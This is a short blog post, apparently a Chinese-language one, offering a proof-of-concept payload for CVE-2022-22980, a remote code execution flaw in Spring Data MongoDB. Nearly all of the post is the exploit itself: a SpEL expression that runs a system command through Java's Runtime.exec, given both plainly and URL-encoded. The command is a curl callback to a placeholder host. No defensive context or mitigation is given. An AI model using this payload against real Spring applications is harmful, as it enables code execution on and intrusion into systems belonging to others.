spring data mongodb remote code execution | cve-2022-22980 poc

spring data mongodb remote code execution | cve-2022-22980 poc

 

 

# 原payload
# T(java.lang.Runtime).getRuntime().exec("curl http://xxx/success")

URLencode Payload:

%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%75%72%6c%20%68%74%74%70%3a%2f%2f%78%78%78%2f%73%75%63%63%65%73%73%22%29

 

posted @ 2022-07-15 14:42  我超怕的  阅读(233)  评论(0编辑  收藏  举报